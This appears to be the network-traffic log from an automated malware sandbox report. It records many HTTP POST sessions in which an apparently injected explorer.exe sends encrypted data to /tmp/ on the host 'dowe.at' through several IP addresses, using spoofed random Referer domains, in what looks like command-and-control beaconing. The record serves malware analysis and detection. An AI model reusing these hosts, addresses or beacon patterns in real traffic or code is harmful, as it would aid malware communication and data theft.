                                                            Nov 30, 2022 00:11:44.773050070 CET4789OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 54 0a ea a6
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA -[k,vuT;Vd'Q\qukF=`B1
                                                            Nov 30, 2022 00:11:45.499025106 CET4790INHTTP/1.0 404 Not Found
                                                            Date: Tue, 29 Nov 2022 23:11:45 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 331
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            21192.168.2.649744201.124.230.180C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:11:45.929184914 CET4791OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://ueuounaic.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 185
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:11:45.929186106 CET4791OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 4b 3a eb fe
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA -[k,vuK:GPyW+,V)=fI\~E2-?z.WZ6!GWCv B
                                                            Nov 30, 2022 00:11:46.882761955 CET4792INHTTP/1.1 200 OK
                                                            Date: Tue, 29 Nov 2022 23:11:46 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 0
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            22192.168.2.649745211.59.14.9080C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:11:47.440696001 CET4793OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://vhxqowscaf.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 223
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:11:47.441612005 CET4793OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 40 27 a6 a9
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA -[k,vu@'lEBDS7ae2/l7"Dj}'|8x"^GtcD<++DA vBA-|^"?LD{ed
                                                            Nov 30, 2022 00:11:48.657201052 CET4794INHTTP/1.0 404 Not Found
                                                            Date: Tue, 29 Nov 2022 23:11:48 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 331
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            23192.168.2.649746201.124.230.180C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:11:49.210225105 CET4795OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://nqdpmu.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 132
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:11:49.210750103 CET4796OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 5f 3d c5 8b
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA -[k,vu_=j&~b{ni?doUhAlb`Cx
                                                            Nov 30, 2022 00:11:50.163073063 CET4796INHTTP/1.0 404 Not Found
                                                            Date: Tue, 29 Nov 2022 23:11:49 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 331
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            24192.168.2.649747200.46.66.7180C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:11:50.394320965 CET4797OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://nxslssk.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 164
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:11:50.394320965 CET4797OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 31 02 ee f0
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA -[k,vu1cXyou})oPePR8A=T^;|y/]L}E
                                                            Nov 30, 2022 00:11:51.255007029 CET4798INHTTP/1.1 200 OK
                                                            Date: Tue, 29 Nov 2022 23:11:50 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 0
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            25192.168.2.649748201.124.230.180C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:11:51.611656904 CET4799OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://rbdses.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 314
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:11:51.611707926 CET4799OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 3c 29 de 95
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA -[k,vu<)VkjK#w:Et3pyPnP;NLA1|}J]X>t6N@c{H,5?6:Z@nU
                                                            Nov 30, 2022 00:11:52.585900068 CET4800INHTTP/1.0 404 Not Found
                                                            Date: Tue, 29 Nov 2022 23:11:52 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 331
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            26192.168.2.649749200.46.66.7180C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:11:52.820238113 CET4801OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://jxvmoh.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 193
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:11:52.820238113 CET4801OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 34 44 ab b6
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA -[k,vu4D[W`Fgt)8Xx-`@tL6aZ0"ThA,EB'h2O+a y,`-
                                                            Nov 30, 2022 00:11:53.679073095 CET4802INHTTP/1.0 404 Not Found
                                                            Date: Tue, 29 Nov 2022 23:11:53 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 331
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            27192.168.2.649750211.59.14.9080C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:11:54.077814102 CET4803OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://hlixtq.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 338
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:11:54.078459024 CET4803OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 61 04 c5 f2
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA -[k,vuaOqzb+^LLuMmPMaY=-Iv/f?DI<8aU7~I8 Ep|mW+|w~RI#2
                                                            Nov 30, 2022 00:11:55.285368919 CET4804INHTTP/1.0 404 Not Found
                                                            Date: Tue, 29 Nov 2022 23:11:54 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 331
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            28192.168.2.649751187.212.179.7580C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:11:55.566342115 CET4805OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://bymgj.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 344
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:11:55.566395998 CET4805OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 71 18 c1 af
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA -[k,vuq\)]\nc&.M@-0`[mWE|aST?JR.U_L!>59BvB +U-k%iz%;Qba.a
                                                            Nov 30, 2022 00:11:56.352952957 CET4812INHTTP/1.1 200 OK
                                                            Date: Tue, 29 Nov 2022 23:11:55 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 0
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            29192.168.2.649753200.46.66.7180C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:11:56.600760937 CET4813OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://jviyq.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 304
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:11:56.600780010 CET4814OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 6f 56 ee 81
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA -[k,vuoVQ)^_B^0y|jE|<R1GJy$#kqQb{H*":~Kt/;e]BYaeVOb
                                                            Nov 30, 2022 00:11:57.485692978 CET4814INHTTP/1.1 200 OK
                                                            Date: Tue, 29 Nov 2022 23:11:57 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 0
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            3192.168.2.649722200.46.66.7180C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:11:01.770284891 CET292OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://dqkjujneki.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 112
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:11:01.770348072 CET292OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 52 1b cd 81
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA -[k,vuR;GX]!\UbX
                                                            Nov 30, 2022 00:11:03.587111950 CET293INHTTP/1.0 404 Not Found
                                                            Date: Tue, 29 Nov 2022 23:11:02 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 331
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
